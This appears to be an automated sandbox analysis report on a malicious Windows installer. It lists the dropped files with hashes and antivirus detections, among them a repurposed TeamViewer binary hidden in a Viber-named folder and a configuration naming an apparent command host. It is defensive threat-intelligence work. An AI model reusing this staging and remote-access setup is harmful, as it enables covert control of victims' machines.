                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:lX0+pO4blOcrEU8KPX0+pO4blOcrEU8K:lE3vUfE3vU
                                                                                                      MD5:17572DB7D0DBC703232DAC6C89A6FD7F
                                                                                                      SHA1:DE7A84F48AFA0F3577751814C5CA65D2A3BB6E22
                                                                                                      SHA-256:9AC0533D9388A9CB1739476F26A9A8E8E169EFD840A136815C0C144AAEAE407A
                                                                                                      SHA-512:D0EE9AE240AE18D039E6C585F6A77B506391B47B9BFBCFB7958004D06A9E1BC862E640767272959A0948541267FA7098C3C9E1F31A6F221633828165639426CF
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview: ..).... ................e.f.3...w........................&..........w...-...y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w...........................................................................................................................................................................................................................................-...y.m.....................-...y..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8192
                                                                                                      Entropy (8bit):0.11125039857702498
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:al/7EvmIsMkl/bJdAtiyUXAll:al/imIs5t4rUA
                                                                                                      MD5:5D4C153B6F12CDE3CD90442430CA538E
                                                                                                      SHA1:8EEE4570E5CFE88F9183FD76A2657FAFB4532935
                                                                                                      SHA-256:B0587864D6A961113666F0EA1592A36E5FDAB791C9186EB05C4DF5E7191CCDD0
                                                                                                      SHA-512:BE69F790037122ED95E0457206F0CE46DF9642E10E415ECEFD07813D3008E2E272D055B327F1897B6AFBB5B8E18817EA4274B6B3B39AED375DD0FD7881541F8C
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview: ..~O.....................................3...w...-...y.......w...............w.......w....:O.....w.......................-...y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):0.11021407349750637
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:264YVXm/Ey6q9995Aidxq3qQ10nMCldimE8eawHjciBd:26Ql68+LyMCldzE9BHjcib
                                                                                                      MD5:0F5698D5106A8089EA0BB644C37CEB2D
                                                                                                      SHA1:26DF04F16CA2B0B83C9376ECEE8DDA62E8372C56
                                                                                                      SHA-256:BB5018BFD89CBC4BFC9090A599A8B3D26BDD524E8FF57CE28C2B4150406A67E0
                                                                                                      SHA-512:1DF0277D6DCEF9781D5923DC2ACEF22A320FD811C8D31500A262A4D0E00CFA8968DAB8CD8E25ECC9692E67969376104D1B0883A4E23578ECDE7EAB2AAAB533F3
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview: ..........................................................................................!......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1..............................................................N...... .....;...r...........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P...........!.....................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):0.11252079590661898
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:MXm/Ey6q9995AiM1miM3qQ10nMCldimE8eawHza1miI9q:1l68c1tMLyMCldzE9BHza1tI9q
                                                                                                      MD5:199F51F7E2863E1151E16C36ECE8CA1E
                                                                                                      SHA1:44F041F381CB2A84C6B2172ACDB6ECAED3EFAEF9
                                                                                                      SHA-256:38AFB0BE5D41DADA846EA8799E62F16EA49F50E27D845FFFA7D549869181B558
                                                                                                      SHA-512:1248839F5D6936DB8A441998ED604D496632EEB9454695BDE49A4014E74EC95B9C7DF660674844046B98C865BA0EA1412C851E5AD706CAB9449967006A3F3B5C
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview: ........................................................................................h*.......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1..............................................................N...... ........r...........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P..........R......................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):0.11266350359777126
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:sXm/Ey6q9995AiV1mK2P3qQ10nMCldimE8eawHza1mK0o:Vl68F1iPLyMCldzE9BHza1Ao
                                                                                                      MD5:7FE29FA15487F70C9F2D9D91A03834F4
                                                                                                      SHA1:2E4A5F7DD714C5E6CA62F1CB46D16861E9925F57
                                                                                                      SHA-256:3B4B910F462DD42F39DE8DA3A10C8EC5AC59CF8AF16F18BF6AE8DEA9B56111BF
                                                                                                      SHA-512:946AE018403FC99AFD1EECC188847B7630478157EFA77EEB4F24FE0397A534EE095076516CD4F8C7ECB0D1EB93201A698806CBCC61DA268DD723FD91C550114D
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview: .........................................................................................g.......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1..............................................................N...... .....I".r...........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.........wp......................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      C:\Users\user\AppData\Local\Temp\nsaF7DF.tmp
                                                                                                      Process:C:\Users\user\Desktop\wogZe27GBB.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):5131242
                                                                                                      Entropy (8bit):6.736055511669049
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:98304:xmfzCAW6LcJjdgHPmMogx1WZRkPapqj+ZG/D+AKbS5CjH:xmfzCgEqHuMogsRkyq0X
                                                                                                      MD5:1E6978657EEB4A9F6B4E84C62B228EE4
                                                                                                      SHA1:496A37AE9417163CFF53FBFEA9BA5BD1AC6BAFAE
                                                                                                      SHA-256:0FFB6906EA4C7B9A2E97FE0B8A205E00C8E5B1A7E03038627B1E6681CC66B986
                                                                                                      SHA-512:412332869C2B7C90A5409338EBBFF96786AEADDAA54A0BA1F0D96035E929D7DFB773A2E02F8C588F15739A3CE0211DAE6074EEFE94AE18F85B5C4FA2C6BCBC6B
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview: ........,.......,.......D.......$.......b...................................................................................................................................................................................................................................................J...V.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl.0001.. (copy)
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):0.11021407349750637
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:264YVXm/Ey6q9995Aidxq3qQ10nMCldimE8eawHjciBd:26Ql68+LyMCldzE9BHjcib
                                                                                                      MD5:0F5698D5106A8089EA0BB644C37CEB2D
                                                                                                      SHA1:26DF04F16CA2B0B83C9376ECEE8DDA62E8372C56
                                                                                                      SHA-256:BB5018BFD89CBC4BFC9090A599A8B3D26BDD524E8FF57CE28C2B4150406A67E0
                                                                                                      SHA-512:1DF0277D6DCEF9781D5923DC2ACEF22A320FD811C8D31500A262A4D0E00CFA8968DAB8CD8E25ECC9692E67969376104D1B0883A4E23578ECDE7EAB2AAAB533F3
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview: ..........................................................................................!......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1..............................................................N...... .....;...r...........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P...........!.....................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl.0001 (copy)
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):0.11252079590661898
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:MXm/Ey6q9995AiM1miM3qQ10nMCldimE8eawHza1miI9q:1l68c1tMLyMCldzE9BHza1tI9q
                                                                                                      MD5:199F51F7E2863E1151E16C36ECE8CA1E
                                                                                                      SHA1:44F041F381CB2A84C6B2172ACDB6ECAED3EFAEF9
                                                                                                      SHA-256:38AFB0BE5D41DADA846EA8799E62F16EA49F50E27D845FFFA7D549869181B558
                                                                                                      SHA-512:1248839F5D6936DB8A441998ED604D496632EEB9454695BDE49A4014E74EC95B9C7DF660674844046B98C865BA0EA1412C851E5AD706CAB9449967006A3F3B5C
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview: ........................................................................................h*.......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1..............................................................N...... ........r...........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P..........R......................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl.0001cd (copy)
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):0.11266350359777126
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:sXm/Ey6q9995AiV1mK2P3qQ10nMCldimE8eawHza1mK0o:Vl68F1iPLyMCldzE9BHza1Ao
                                                                                                      MD5:7FE29FA15487F70C9F2D9D91A03834F4
                                                                                                      SHA1:2E4A5F7DD714C5E6CA62F1CB46D16861E9925F57
                                                                                                      SHA-256:3B4B910F462DD42F39DE8DA3A10C8EC5AC59CF8AF16F18BF6AE8DEA9B56111BF
                                                                                                      SHA-512:946AE018403FC99AFD1EECC188847B7630478157EFA77EEB4F24FE0397A534EE095076516CD4F8C7ECB0D1EB93201A698806CBCC61DA268DD723FD91C550114D
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview: .........................................................................................g.......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1..............................................................N...... .....I".r...........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.........wp......................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll
                                                                                                      Process:C:\Users\user\Desktop\wogZe27GBB.exe
                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):73696
                                                                                                      Entropy (8bit):6.629217484187715
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:DWNCi7sBIpvYqSRw6zhD16poDVDREv1Mme9MfPGz49jjZLq00RKi5jYjfLhs8WhU:A6BmmPX6mDVdme9uGzWH10I+Uje8WhU
                                                                                                      MD5:AC34AB95CBC23CDF332BEA2CC0FFBF35
                                                                                                      SHA1:43ED3DD9863791294064D2F85F3DF3F08D572037
                                                                                                      SHA-256:4BA3BD623A9919A357708DA57BBBBC978706DAD8D57DA64E89C780147843C7CE
                                                                                                      SHA-512:3740DFD9F8ED967953C6A3522D66B5E547D3BB2A4C618FD667A817F6283E4353E2B81E994938E989AEA89BFD7A23E41309647EDCD1F6F0A075436E5B1FEE7B0A
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Metadefender, Detection: 6%, Browse
                                                                                                      • Antivirus: ReversingLabs, Detection: 51%
                                                                                                      Reputation:unknown
                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N.@....................../...........................................................Rich....................PE..L...QQ.a...........!.........L............................................... ......-s....@.........................`...D.......,...................................0...................................................0............................text............................... ..`.rdata...,..........................@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                      C:\Users\user\AppData\Roaming\ViberPC\Icons\TeamViewer.ini
                                                                                                      Process:C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      File Type:data
                                                                                                      Category:modified
                                                                                                      Size (bytes):2686
                                                                                                      Entropy (8bit):3.08315222410398
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Eo+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+J:4
                                                                                                      MD5:2EC23B404939C7DD6574832D486A52A4
                                                                                                      SHA1:0F29DBB69ECDFC319C36D354E673B0C2108155DA
                                                                                                      SHA-256:4B76AA0920E1C1F44F69AF968390128D41C5E0BBD8690B86FC5FBA8FAE9980BB
                                                                                                      SHA-512:97E4EA5179D8B175BFDCA1A1FFA74288403F0C3DA85ECD74F7B328471130C98EC53010A489EE72A871611B4BF5B37D47229FC34BFACB919A15D4B36705F6FC30
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview: h.d.n.=.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o.....h.p.n.=./.B.8.C.6.3.1.A.8./.....h.s.n.=.1.....h.t.=.3.6.....r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.
                                                                                                      C:\Users\user\AppData\Roaming\ViberPC\Icons\Teamviewer_Resource_ja.dll
                                                                                                      Process:C:\Users\user\Desktop\wogZe27GBB.exe
                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):607528
                                                                                                      Entropy (8bit):6.564133582926054
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:r5hmfFy7ZJ0uUCAD06v7JlHZctms+2lifZ0iMe8d6YySkYQKMDqtAu3NhgGy6wSP:Vhmf4ACAzneosEi6YhvAuUGyUrNJbL
                                                                                                      MD5:554EE592B125CFDF81B376B5C24AA61C
                                                                                                      SHA1:666D2C04171246734575D4453289AA2D9AF93B97
                                                                                                      SHA-256:B296EF421D5B7F569E623D41A42D87A064C4358CFA89A192988F854929E3ABD1
                                                                                                      SHA-512:6C3111BF9D26929D426797EBDD8D804B34E2E8F593BF488298E70964538F2DA3D971C4ED3C3237C829AE7DE4FDB8D4316D84F153E93E3788808547A8538B73F5
                                                                                                      Malicious:false
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Reputation:unknown
                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........-T.L:..L:..L:...F..L:...B..L:.Rich.L:.........PE..L.....LK...........!.........................................................0.......................................................................0..(.... .......................................................................................rsrc...............................@..@.reloc....... ....... ..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      Process:C:\Users\user\Desktop\wogZe27GBB.exe
                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4375848
                                                                                                      Entropy (8bit):6.621789733656387
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:98304:6jdgHPmMogx1WZRkPapqj+ZG/D+AKbS5m:4qHuMogsRkyq0N
                                                                                                      MD5:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                      SHA1:A3A7498F02BAB188B3944382BBA4D016D63607D1
                                                                                                      SHA-256:D2CDCA8EFA27089D3DEAD0CCEAFBE470B3815C9C2A362C007D1F516E5379AC92
                                                                                                      SHA-512:412B42C540A9FE41709453D725B7A1E888849326A70A411E645F29240D730D69EBCF4B26E6870D33E0A395C612470BD00064025D22B0C6BCD211242E8EF6CEA6
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Reputation:unknown
                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............o...o...o.......o.......o.....2.o.....q.o.F.2...o...n...o.......o.F.0...o.......o.......o.......o.Rich..o.................PE..L.....LK..................3.........F........03...@...........................K......ZC.......................................@...... K.8`............B.(...........pe4......................x:.....`x:.@............03. ............................text.....3.......3................. ..`.rdata..&....03.......3.............@..@.data...h....P@.."...*@.............@....tls..........K......LB.............@....rsrc...8`... K..b...NB.............@..@........................................................................................................................................................................................................................................................................................................
                                                                                                      C:\Users\user\AppData\Roaming\ViberPC\Icons\vpn.cab
                                                                                                      Process:C:\Users\user\Desktop\wogZe27GBB.exe
                                                                                                      File Type:Microsoft Cabinet archive data, 71196 bytes, 8 files
                                                                                                      Category:dropped
                                                                                                      Size (bytes):71196
                                                                                                      Entropy (8bit):7.996182851828797
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1536:qUTRtkxXFuG1DKNYCqRBiFxMZPQCJh/njgG5+jC5hA101pNO0:qUNtax12mCqRBiyQG/jgG5+j2NO0
                                                                                                      MD5:8A84AA1B9F20DC194947D7AC592D818E
                                                                                                      SHA1:4A77AB0D59F39BF600BB89D9121446F6AA2D139B
                                                                                                      SHA-256:8A740BE5D92B734E77B210354988DFD49F31C49814240513CF4B0353A8CE6DFB
                                                                                                      SHA-512:B3F90ADB48861CD775F15E75885C81A130D62DFE429A5833FA1CE0BC203EEA15BD8A7306618B1F4D27810493300400C8B149D58032F90F0E9D93B04F9B8F1050
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview: MSCF............,...............JA..H........)........k<'b..64\teamviewervpn.cat......)....k<'b..64\TeamViewerVPN.inf.(....>....k<'b..64\teamviewervpn.sys..<........k<&b..64\install.exe..)........k<'b..86\teamviewervpn.cat......-....k<'b..86\TeamViewerVPN.inf..b...B....k<'b..86\teamviewervpn.sys...........k<&b..86\install.exe.h.t"X<..[.....`.....@...N.f.|..U.......$."..L.F..4....|....U$Q/...%.J).D...@F.......f...9..../@.x;.N..w..2...i1P.....O.....T...T.y...``...;.$.&....@........@..~..\...J.44...:.@....M.....x\.0c|..W...,.|.x..+.P..N.. ..S0@B.;?.(..B..,.%.{.. ....(T.....U.5..=.3'rxci.;....P$..H)...1...h._e..{....Q._..}...K......U.s...._..WRWlS.8.._...D.NI..>.|O<..q...$0.EA*8d...../..=@2q...g_.Hs|`+...`.>U..)X.G*.8.....>..!4 ....}..Ps.a.8.......4.0`._t%...P.qgr..'..~.d..r.....o...w..q........,O.K..Y.8..M.D...p........~.....O?......}@.....>....O..N...c../p..[....._=.~.S....Q..p.O...@.WL....*..}..%1...3a.....u...)..K.Y...s..E;...".e.....X0(IR..'..1...\..6...(i
                                                                                                      C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):55
                                                                                                      Entropy (8bit):4.306461250274409
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                      C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
                                                                                                      Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                      File Type:data
                                                                                                      Category:modified
                                                                                                      Size (bytes):906
                                                                                                      Entropy (8bit):3.148609195269616
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:58KRBubdpkoF1AG3rlsQlw3IH5k9+MlWlLehB4yAq7ejCEsQlw3IHI:OaqdmuF3rlp+F+kWReH4yJ7MNp+f
                                                                                                      MD5:ADC0A8B01369CAC8EB3BF72C06D5D1C2
                                                                                                      SHA1:E3F79ECF0CCC2F022F9264DBF28268FF2F18157F
                                                                                                      SHA-256:FC5F3AA59658229CEB400FD3D707B0977E947F5DD13862044ABCCEEA1BB416D5
                                                                                                      SHA-512:F0BC86DE276547D63DD085C2E37F4A33BFC58E874F077CC6A910F83455EF36B18E367B0B9C170F5D10AC3EFE439E070451E4367B03BB86384EA9191C5DBDC15D
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview: ........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. W.e.d. .. S.e.p. .. 1.5. .. 2.0.2.1. .1.3.:.4.6.:.2.2.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. W.e.d. .. S.e.p. .. 1.5. .. 2.0.2.1. .1.3.:.4.6.:.2.2.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

                                                                                                      Static File Info

                                                                                                      General

                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Entropy (8bit):7.995528478877956
                                                                                                      TrID:
                                                                                                      • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                                      • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                      File name:wogZe27GBB.exe
                                                                                                      File size:1773472
                                                                                                      MD5:5efc68abd7fec415e34980d95a06a66a
                                                                                                      SHA1:34b243a0b3e322b8983b528caa5849395360a91d
                                                                                                      SHA256:0f655a8ac0d7fdc7ac44fdd9799129848faf9c73bfa0e108fd903de439447232
                                                                                                      SHA512:92aa33884c54bdb2608994b3e4c9b0909b002a38344bae2b4fb01c9a713542cf8a51684a0e3d614730340a995bb918dedb5e4c801ba9e3afa834399f38232079
                                                                                                      SSDEEP:49152:tMvOJUaiTddo110aPENuUn/vrmUJjefHj9uDd:tHjiTvLn3rb4jkd
                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L.....*J.................\.........

                                                                                                      File Icon

                                                                                                      Icon Hash:8282c2d2d2c292a1

                                                                                                      Static PE Info

                                                                                                      General

                                                                                                      Entrypoint:0x40323c
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:true
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                      Time Stamp:0x4A2AE2A2 [Sat Jun 6 21:41:54 2009 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:4
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:4
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:4
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:5bd07784f328e868356a895d4ab1a505

                                                                                                      Authenticode Signature

                                                                                                      Signature Valid:true
